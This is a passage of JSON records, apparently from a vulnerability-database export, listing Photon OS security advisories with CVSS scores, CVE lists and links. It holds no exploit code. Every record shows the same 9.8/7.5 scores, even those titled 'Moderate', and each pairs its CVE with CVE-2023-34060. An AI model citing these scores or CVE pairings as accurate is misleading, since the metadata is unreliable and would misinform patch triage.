"unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14834", "CVE-2023-34060"], "modified": "2020-01-23T00:00:00", "id": "PHSA-2020-0201", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-201", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:02:48", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-10-21T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0334", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19377", "CVE-2023-34060"], "modified": "2020-10-21T00:00:00", "id": "PHSA-2020-0334", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-334", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:03:08", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-25T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-0328", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25211", "CVE-2023-34060"], "modified": "2020-09-25T00:00:00", "id": "PHSA-2020-0328", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-328", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:03:21", "description": "Updates of ['gettext'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-21T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0326", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12825", "CVE-2023-34060"], "modified": "2020-09-21T00:00:00", "id": "PHSA-2020-0326", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-326", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:03:38", "description": "Updates of ['zeromq'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-09T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0322", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15166", "CVE-2023-34060"], "modified": "2020-09-09T00:00:00", "id": "PHSA-2020-0322", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-322", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:03:57", "description": "Updates of ['go'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-08-25T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0316", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16845", "CVE-2023-34060"], "modified": "2020-08-25T00:00:00", "id": "PHSA-2020-0316", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-316", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:58:29", "description": "Updates of ['openssl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-26T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-0429", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3712", "CVE-2023-34060"], "modified": "2021-08-26T00:00:00", "id": "PHSA-2021-0429", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-429", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:01:20", "description": "Updates of ['openldap'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-03-05T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0367", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27212", "CVE-2023-34060"], "modified": "2021-03-05T00:00:00", "id": "PHSA-2021-0367", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-367", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:51:40", "description": "Updates of ['haproxy'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-21T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0104", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40346", "CVE-2023-34060"], "modified": "2021-09-21T00:00:00", "id": "PHSA-2021-4.0-0104", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-104", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:51:27", "description": "Updates of ['vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-10-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0110", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3778", "CVE-2023-34060"], "modified": "2021-10-03T00:00:00", "id": "PHSA-2021-4.0-0110", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-110", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:32:15", "description": "Updates of ['krb5'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-08-01T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-5.0-0062", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-36054"], "modified": "2023-08-01T00:00:00", "id": "PHSA-2023-5.0-0062", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-62", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:33:44", "description": "Updates of ['ncurses'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-06-13T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-5.0-0024", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-29491", "CVE-2023-34060"], "modified": "2023-06-13T00:00:00", "id": "PHSA-2023-5.0-0024", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:13:56", "description": "Updates of ['nettle'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-03-23T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0119", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6489", "CVE-2023-34060"], "modified": "2018-03-23T00:00:00", "id": "PHSA-2018-0119", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-119", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:15:59", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-03-28T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2017-0031", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2636", "CVE-2023-34060"], "modified": "2017-03-28T00:00:00", "id": "PHSA-2017-0031", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-31", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:14:34", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-10-04T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2017-0075", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14340", "CVE-2023-34060"], "modified": "2017-10-04T00:00:00", "id": "PHSA-2017-0075", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-75", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T22:11:42", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-06-22T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2018-0151", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3639", "CVE-2023-34060"], "modified": "2018-06-22T00:00:00", "id": "PHSA-2018-0151", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-151", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:19:39", "description": "Updates of ['python-py'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-06-24T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0258", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29651", "CVE-2023-34060"], "modified": "2021-06-24T00:00:00", "id": "PHSA-2021-3.0-0258", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:20:36", "description": "Updates of ['binutils'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-05-04T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-3.0-0230", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3487", "CVE-2023-34060"], "modified": "2021-05-04T00:00:00", "id": "PHSA-2021-3.0-0230", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:21:25", "description": "Updates of ['redis'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-16T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-3.0-0220", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3470", "CVE-2023-34060"], "modified": "2021-04-16T00:00:00", "id": "PHSA-2021-3.0-0220", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:18:53", "description": "Updates of ['nettle'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-19T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0286", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3580", "CVE-2023-34060"], "modified": "2021-08-19T00:00:00", "id": "PHSA-2021-3.0-0286", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-286", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T21:18:56", "description": "Updates of ['consul'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0279", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 